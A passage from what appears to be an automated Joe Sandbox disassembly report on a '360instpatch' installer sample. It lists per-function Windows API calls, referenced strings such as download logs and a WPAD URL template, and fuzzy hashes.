                                                                                                                                                                                                              • Instruction ID: bcb618a7cf4443b55376ba6b429889467c752e7b21f2d288882f23078582d55a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c558f82eea39be37a152d85dd7252eb725c8fa7d1a88f039168af1eb40bde10b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7331D137500201ABDB205FB8CC44FAE77F8FB16708F20456DE552E22A1EB39E4168B71
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _memset.LIBCMT ref: 00B7867B
                                                                                                                                                                                                              • _memset.LIBCMT ref: 00B7868C
                                                                                                                                                                                                              • GetVersionExW.KERNEL32(?,?,?,?,?,?,00000000), ref: 00B786A1
                                                                                                                                                                                                              • GetVersionExW.KERNEL32(?,?,?,?,?,?,00000000), ref: 00B786B2
                                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,GetNativeSystemInfo,?,?,?,?,?,00000000), ref: 00B786C2
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00B786C9
                                                                                                                                                                                                              • GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,00000000), ref: 00B786D7
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4114619207.0000000000B11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114543493.0000000000B10000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114822760.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114884300.0000000000BF3000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114936766.0000000000BF6000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114994565.0000000000C00000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114994565.0000000000EED000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_b10000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Version_memset$AddressHandleInfoModuleNativeProcSystem
                                                                                                                                                                                                              • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                                                                                                                                              • API String ID: 675204089-192647395
                                                                                                                                                                                                              • Opcode ID: 8b6b52824af3135d6cc757cd48bcb625b9f595e065ca7ba7e53358df4c0e21e5
                                                                                                                                                                                                              • Instruction ID: 1b0a93b179b4e4ee69e8c42d7a5696fed0e966eff99ca99b8c1906eef75d4670
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8b6b52824af3135d6cc757cd48bcb625b9f595e065ca7ba7e53358df4c0e21e5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 67114C71D40258ABDF20ABE49C49FAE7BE8BB08708F0045AAE525E7180EF74D5098A65
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _memset.LIBCMT ref: 00B7A71F
                                                                                                                                                                                                              • _memset.LIBCMT ref: 00B7A72D
                                                                                                                                                                                                              • GetTempPathW.KERNEL32(00000400,?,?,00000000,000000CE,DLL,00000014,00B2BCDE), ref: 00B7A741
                                                                                                                                                                                                              • _memset.LIBCMT ref: 00B7A754
                                                                                                                                                                                                                • Part of subcall function 00B512A8: _memset.LIBCMT ref: 00B512EC
                                                                                                                                                                                                                • Part of subcall function 00B512A8: CoCreateGuid.OLE32(?,?,?,00000800), ref: 00B512F8
                                                                                                                                                                                                                • Part of subcall function 00B512A8: _memset.LIBCMT ref: 00B51309
                                                                                                                                                                                                                • Part of subcall function 00B512A8: _wcsncpy.LIBCMT ref: 00B5135F
                                                                                                                                                                                                              • PathCombineW.SHLWAPI(?,?,?), ref: 00B7A784
                                                                                                                                                                                                              • _wcscat.LIBCMT ref: 00B7A796
                                                                                                                                                                                                              • PathFileExistsW.SHLWAPI(?), ref: 00B7A7A4
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4114619207.0000000000B11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114543493.0000000000B10000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114822760.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114884300.0000000000BF3000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114936766.0000000000BF6000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114994565.0000000000C00000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114994565.0000000000EED000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_b10000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _memset$Path$CombineCreateExistsFileGuidTemp_wcscat_wcsncpy
                                                                                                                                                                                                              • String ID: .tmp
                                                                                                                                                                                                              • API String ID: 2935203105-2986845003
                                                                                                                                                                                                              • Opcode ID: 6aed1e22f67f5e85cbd8cb51e7949d959214440a3d70b442575c582d19045893
                                                                                                                                                                                                              • Instruction ID: a680c677ca0ead8294c044d02633bd6048f339896361d3f4a55653e9e0980d53
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6aed1e22f67f5e85cbd8cb51e7949d959214440a3d70b442575c582d19045893
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 082145B690021C6BDB14DBA4DD85EDE77FCEB89705F0004F6B319D3141EA74EA458B60
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _memset.LIBCMT ref: 6BF304FB
                                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000,?,00000000,?,00000001), ref: 6BF30528
                                                                                                                                                                                                              • RegisterClassExW.USER32(00000030), ref: 6BF3054C
                                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000,00000000,?,00000000,?,00000001), ref: 6BF30554
                                                                                                                                                                                                              • CreateWindowExW.USER32(00000000,360AsyncHelper,360AsyncHelper,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000), ref: 6BF30566
                                                                                                                                                                                                              • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 6BF30573
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119875025.000000006BEE0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF7F000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF85000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120063873.000000006BF8A000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120095888.000000006BFCC000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120132063.000000006BFCF000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: HandleModuleWindow$ClassCreateLongRegister_memset
                                                                                                                                                                                                              • String ID: 0$360AsyncHelper
                                                                                                                                                                                                              • API String ID: 845610114-1673954876
                                                                                                                                                                                                              • Opcode ID: 81a0515f83f06bfcbb849c3a450c37ee2ae3bf39c5a356453be83d6585194ddf
                                                                                                                                                                                                              • Instruction ID: 02f4a6ad91fd2cf2f7d5b659668c3b6ded9c64ef65b0ce19666d618de727e566
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 81a0515f83f06bfcbb849c3a450c37ee2ae3bf39c5a356453be83d6585194ddf
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 21110AB2C01218ABDB109F9AD848E9FFEFCEF95750B10455EE415E2260D77455058BA1
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetWindowLongW.USER32(?,000000EB), ref: 6BF2FFAB
                                                                                                                                                                                                              • WSAGetLastError.WS2_32(4004667F,?), ref: 6BF30063
                                                                                                                                                                                                              • WSAGetLastError.WS2_32(4004667F,?), ref: 6BF3009F
                                                                                                                                                                                                              • DefWindowProcW.USER32(?,?,?,?), ref: 6BF3028A
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119875025.000000006BEE0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF7F000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF85000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120063873.000000006BF8A000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120095888.000000006BFCC000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120132063.000000006BFCF000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorLastWindow$LongProc
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2699195558-0
                                                                                                                                                                                                              • Opcode ID: 44492a33a680f0e936d9867719593487a38b1434ebcecfa68bb5f531423ac779
                                                                                                                                                                                                              • Instruction ID: fef9c930bf21c55256d92b43a4cd24ef183e2dc1626daee70b345c0a30ce88bd
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 44492a33a680f0e936d9867719593487a38b1434ebcecfa68bb5f531423ac779
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 47A1D0736046269FDB40DAB8C994B2EB7B5BF45710F10829AE905D76B1D7BCD840CBD0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • WSAGetLastError.WS2_32(?,?,?,?,?), ref: 6BF18E00
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 6BF18E5B
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 6BF18E63
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 6BF18E6B
                                                                                                                                                                                                                • Part of subcall function 6BF23F7C: _memset.LIBCMT ref: 6BF23FAF
                                                                                                                                                                                                                • Part of subcall function 6BF23F7C: wvnsprintfW.SHLWAPI(?,000003FF,?,?), ref: 6BF23FCA
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • [%d.%3d] %s(%s) closed, error code %d, api %d, state %d, downloaded %I64d, %d ms, xrefs: 6BF18E1B
                                                                                                                                                                                                              • [%d.%3d] OnClose_Receive Date tail_len = %d, xrefs: 6BF18CA8
                                                                                                                                                                                                              • [%d.%3d] OnClose HttpBlock RangeFrom = %I64u BodyDownload = %I64u, xrefs: 6BF18D69
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CountTick$ErrorLast_memsetwvnsprintf
                                                                                                                                                                                                              • String ID: [%d.%3d] OnClose HttpBlock RangeFrom = %I64u BodyDownload = %I64u$[%d.%3d] OnClose_Receive Date tail_len = %d$[%d.%3d] %s(%s) closed, error code %d, api %d, state %d, downloaded %I64d, %d ms
                                                                                                                                                                                                              • API String ID: 1507222378-1900711150
                                                                                                                                                                                                              • Opcode ID: 56da1fc103e5fa293384a50a5ba16e4a755011e8874cfd56d33701c30b2328fb
                                                                                                                                                                                                              • Instruction ID: f02bf6cb322b95fb7f47a6caf56a99343f1adb6901393a0648aacf716f5f1726
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 56da1fc103e5fa293384a50a5ba16e4a755011e8874cfd56d33701c30b2328fb
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 72914972604B05AFE725DFB4C994BDBB7E6FB58304F00481DE66A97260DB38B904CB61
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __EH_prolog3.LIBCMT ref: 6BF03AE2
                                                                                                                                                                                                                • Part of subcall function 6BF1BFAE: __EH_prolog3.LIBCMT ref: 6BF1BFB5
                                                                                                                                                                                                                • Part of subcall function 6BF1BFAE: _memset.LIBCMT ref: 6BF1C152
                                                                                                                                                                                                                • Part of subcall function 6BF1998E: __EH_prolog3.LIBCMT ref: 6BF19995
                                                                                                                                                                                                                • Part of subcall function 6BEE8514: char_traits.LIBCPMT ref: 6BEE8539
                                                                                                                                                                                                                • Part of subcall function 6BF16CA0: htons.WS2_32(?), ref: 6BF16CE0
                                                                                                                                                                                                              • _memset.LIBCMT ref: 6BF03C4A
                                                                                                                                                                                                                • Part of subcall function 6BF240CF: _memset.LIBCMT ref: 6BF24102
                                                                                                                                                                                                                • Part of subcall function 6BF240CF: wvnsprintfW.SHLWAPI(?,000003FF,?,?), ref: 6BF2411D
                                                                                                                                                                                                                • Part of subcall function 6BF19E9E: _memset.LIBCMT ref: 6BF19FC9
                                                                                                                                                                                                                • Part of subcall function 6BF1B0FA: __EH_prolog3.LIBCMT ref: 6BF1B101
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • ConnetPacServer AsyncStartDownload fail, xrefs: 6BF03B47
                                                                                                                                                                                                              • ConnetPacServer dataLen is Err!, xrefs: 6BF03C73
                                                                                                                                                                                                              • ConnetPacServer code:%d, xrefs: 6BF03C08
                                                                                                                                                                                                              • ConnetPacServer ok!, xrefs: 6BF03C6C
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: H_prolog3_memset$char_traitshtonswvnsprintf
                                                                                                                                                                                                              • String ID: ConnetPacServer AsyncStartDownload fail$ConnetPacServer code:%d$ConnetPacServer dataLen is Err!$ConnetPacServer ok!
                                                                                                                                                                                                              • API String ID: 2665625422-3491224597
                                                                                                                                                                                                              • Opcode ID: a9dcdf7fca80c0c200c3b658ad3f264d343d0b993a3cfcf1c24b5fd1e05b4071
                                                                                                                                                                                                              • Instruction ID: 3cb12c40539c8601e5a21235769f40423224440023a2d7934b2b5ad5ce9bced2
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a9dcdf7fca80c0c200c3b658ad3f264d343d0b993a3cfcf1c24b5fd1e05b4071
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9D51707390414AAFDB14DFB4CCA1DEE73B8FF18248F104419E916A61B1EF399A05DA61
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00B22750: _vswprintf_s.LIBCMT ref: 00B22783
                                                                                                                                                                                                              • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000,?,00BFCDA4,?,?), ref: 00B92492
                                                                                                                                                                                                              • _memset.LIBCMT ref: 00B924BF
                                                                                                                                                                                                              • _strncpy.LIBCMT ref: 00B924FB
                                                                                                                                                                                                              • DeviceIoControl.KERNEL32 ref: 00B92531
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00B9259B
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4114619207.0000000000B11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_b10000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseControlCreateDeviceFileHandle_memset_strncpy_vswprintf_s
                                                                                                                                                                                                              • String ID: SCSIDISK$\\.\Scsi%d:
                                                                                                                                                                                                              • API String ID: 170396225-2176293039
                                                                                                                                                                                                              • Opcode ID: 89173b295b6390cd9450748a9bc99e3a4313f5762a0e5915804cd8832c3466e8
                                                                                                                                                                                                              • Instruction ID: 1b7c775079b1481cd917be12c244494d54f51ce41d13996310569cd79e6586ae
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 89173b295b6390cd9450748a9bc99e3a4313f5762a0e5915804cd8832c3466e8
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D34191B4A48340ABE730DB14DC86FABB7D8EB98704F40096DF698972C1D7B5A508C757
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __EH_prolog3.LIBCMT ref: 00B80896
                                                                                                                                                                                                                • Part of subcall function 00B7A6F2: _memset.LIBCMT ref: 00B7A71F
                                                                                                                                                                                                                • Part of subcall function 00B7A6F2: _memset.LIBCMT ref: 00B7A72D
                                                                                                                                                                                                                • Part of subcall function 00B7A6F2: GetTempPathW.KERNEL32(00000400,?,?,00000000,000000CE,DLL,00000014,00B2BCDE), ref: 00B7A741
                                                                                                                                                                                                                • Part of subcall function 00B7A6F2: _memset.LIBCMT ref: 00B7A754
                                                                                                                                                                                                                • Part of subcall function 00B7A6F2: PathCombineW.SHLWAPI(?,?,?), ref: 00B7A784
                                                                                                                                                                                                                • Part of subcall function 00B7A6F2: _wcscat.LIBCMT ref: 00B7A796
                                                                                                                                                                                                                • Part of subcall function 00B7A6F2: PathFileExistsW.SHLWAPI(?), ref: 00B7A7A4
                                                                                                                                                                                                              • DeleteFileW.KERNEL32(?,00000010), ref: 00B80903
                                                                                                                                                                                                              • _memset.LIBCMT ref: 00B8092F
                                                                                                                                                                                                              • GetTempPathW.KERNEL32(00000400,00000000,?,?,?), ref: 00B80940
                                                                                                                                                                                                                • Part of subcall function 00B80691: __EH_prolog3.LIBCMT ref: 00B806B0
                                                                                                                                                                                                                • Part of subcall function 00B80691: PathFileExistsW.SHLWAPI(?,00000010), ref: 00B806CC
                                                                                                                                                                                                                • Part of subcall function 00B80691: _memset.LIBCMT ref: 00B8070A
                                                                                                                                                                                                                • Part of subcall function 00B80691: _memset.LIBCMT ref: 00B807B9
                                                                                                                                                                                                              • SHCreateDirectory.SHELL32(00000000,?,?,{A44B7723-4283-41b8-B9C0-6B1983C61382}.tmp,00000000,?,?,?), ref: 00B8096E
                                                                                                                                                                                                              • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00B809A7
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • {A44B7723-4283-41b8-B9C0-6B1983C61382}.tmp, xrefs: 00B80952
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4114619207.0000000000B11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_b10000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _memset$Path$File$DeleteExistsH_prolog3Temp$CombineCreateDirectory_wcscat
                                                                                                                                                                                                              • String ID: {A44B7723-4283-41b8-B9C0-6B1983C61382}.tmp
                                                                                                                                                                                                              • API String ID: 3543345046-342223665
                                                                                                                                                                                                              • Opcode ID: a7dcefe587e449bd1e335862ebff75615a938c034be530a840809d1e681b2be8
                                                                                                                                                                                                              • Instruction ID: cd73decfd18c02f5e2678a238ece5c959b89950e4455c73a82d8595772af9054
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a7dcefe587e449bd1e335862ebff75615a938c034be530a840809d1e681b2be8
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 42316D71A102199BDB54FBA4DC92AFEB7F8FF04304F0044A9E515A7291EF346A09CBA0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _malloc.LIBCMT ref: 6BF02387
                                                                                                                                                                                                                • Part of subcall function 6BF3856A: __FF_MSGBANNER.LIBCMT ref: 6BF3858D
                                                                                                                                                                                                                • Part of subcall function 6BF3856A: __NMSG_WRITE.LIBCMT ref: 6BF38594
                                                                                                                                                                                                                • Part of subcall function 6BF3856A: RtlAllocateHeap.NTDLL(00000000,-0000000D,00000001,00000000,00000000,?,6BF42E8E,00000002,00000001,00000002,?,6BF3F8B1,00000018,6BF7C4F0,0000000C,6BF3F942), ref: 6BF385E1
                                                                                                                                                                                                              • GetNetworkParams.IPHLPAPI(00000000,?), ref: 6BF0239D
                                                                                                                                                                                                              • _malloc.LIBCMT ref: 6BF023B3
                                                                                                                                                                                                              • GetNetworkParams.IPHLPAPI(00000000,?), ref: 6BF023C8
                                                                                                                                                                                                              • _memset.LIBCMT ref: 6BF023EF
                                                                                                                                                                                                              • __snwprintf.LIBCMT ref: 6BF02416
                                                                                                                                                                                                                • Part of subcall function 6BF389A5: __lock.LIBCMT ref: 6BF389C3
                                                                                                                                                                                                                • Part of subcall function 6BF389A5: ___sbh_find_block.LIBCMT ref: 6BF389CE
                                                                                                                                                                                                                • Part of subcall function 6BF389A5: ___sbh_free_block.LIBCMT ref: 6BF389DD
                                                                                                                                                                                                                • Part of subcall function 6BF389A5: HeapFree.KERNEL32(00000000,00000002,6BF7C288,0000000C,6BF3F908,00000000,6BF7C4F0,0000000C,6BF3F942,00000002,00000830,?,6BF47C19,00000004,6BF7C818,0000000C), ref: 6BF38A0D
                                                                                                                                                                                                                • Part of subcall function 6BF389A5: GetLastError.KERNEL32(?,6BF47C19,00000004,6BF7C818,0000000C,6BF42ED8,00000002,0000083F,00000000,00000000,00000000,?,6BF3F137,00000001,00000214), ref: 6BF38A1E
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • http://wpad.%s/wpad.dat, xrefs: 6BF0240D
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119875025.000000006BEE0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF7F000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF85000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120063873.000000006BF8A000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120095888.000000006BFCC000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120132063.000000006BFCF000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: HeapNetworkParams_malloc$AllocateErrorFreeLast___sbh_find_block___sbh_free_block__lock__snwprintf_memset
                                                                                                                                                                                                              • String ID: http://wpad.%s/wpad.dat
                                                                                                                                                                                                              • API String ID: 2241623331-1081111291
                                                                                                                                                                                                              • Opcode ID: 091ffec2e46f53ba1c40dbe5b3fc4b7955a970aec6b3a3cc916f36612a5be726
                                                                                                                                                                                                              • Instruction ID: 4655d2a113c0a05f3942daf350a091bce0e36fd7dc64aaada7c0f7e9b5c7e44e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 091ffec2e46f53ba1c40dbe5b3fc4b7955a970aec6b3a3cc916f36612a5be726
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3E21273790012ABAD702CB748C51EEEB3BCAF49B14F5040AAE508E3031EF7D9A8557B5
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __EH_prolog3.LIBCMT ref: 6BEEA36C
                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 6BEEA376
                                                                                                                                                                                                                • Part of subcall function 6BEFAE3C: KiUserExceptionDispatcher.NTDLL(406D1388,00000000,00000004,00001000,6BF78AA8,00000018,6BF2E73E,00000000), ref: 6BEFAE6F
                                                                                                                                                                                                                • Part of subcall function 6BEE802B: WaitForSingleObject.KERNEL32(?,000000FF), ref: 6BEE8033
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 6BEEA3A9
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 6BEEA3B3
                                                                                                                                                                                                                • Part of subcall function 6BEEA0F5: __EH_prolog3_GS.LIBCMT ref: 6BEEA0FC
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 6BEEA3C3
                                                                                                                                                                                                                • Part of subcall function 6BF23FED: _memset.LIBCMT ref: 6BF24020
                                                                                                                                                                                                                • Part of subcall function 6BF23FED: wvnsprintfW.SHLWAPI(?,000003FF,?,00007148), ref: 6BF2403B
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • [DiskScheduler] type:%d, taskid:%d, cost:%dms, queue:%d., xrefs: 6BEEA3DC
                                                                                                                                                                                                              • p2sp.Disk, xrefs: 6BEEA371
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CountTick$CurrentDispatcherExceptionH_prolog3H_prolog3_ObjectSingleThreadUserWait_memsetwvnsprintf
                                                                                                                                                                                                              • String ID: [DiskScheduler] type:%d, taskid:%d, cost:%dms, queue:%d.$p2sp.Disk
                                                                                                                                                                                                              • API String ID: 1914228569-2306218905
                                                                                                                                                                                                              • Opcode ID: 6cc952c3b3099df48130af7ab32dea5ee8aacc5ee6598501da0a096fa9c472de
                                                                                                                                                                                                              • Instruction ID: 50bf7dba989ab8402bf82a136b687b4c29094294d12e250e5e18b8cca421ee40
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6cc952c3b3099df48130af7ab32dea5ee8aacc5ee6598501da0a096fa9c472de
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F111A073C10219AFDF40DBF4C944BEEB7B5BB08329F20415AE111E2190C779E6558BB2
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(?,?,?,00000000), ref: 6BEE78B6
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 6BEE78C7
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 6BEE78CD
                                                                                                                                                                                                              • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 6BEE78E9
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 6BEE78FE
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • [%d.] __write_disk WriteFile fail, error code is %d, xrefs: 6BEE7904
                                                                                                                                                                                                              • [%d.] __write_disk SetFilePointer fail, error code is %d, xrefs: 6BEE78D3
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorLast$File$PointerWrite
                                                                                                                                                                                                              • String ID: [%d.] __write_disk SetFilePointer fail, error code is %d$[%d.] __write_disk WriteFile fail, error code is %d
                                                                                                                                                                                                              • API String ID: 3440492293-1343894148
                                                                                                                                                                                                              • Opcode ID: ca163ee8773178580c16955a931fc0360b074a102bcbe9f4e4e0d875a9d37814
                                                                                                                                                                                                              • Instruction ID: 7ae577cbde26f9473741e231190c9436e2f8c56e222010dba93d7155ee0f4de9
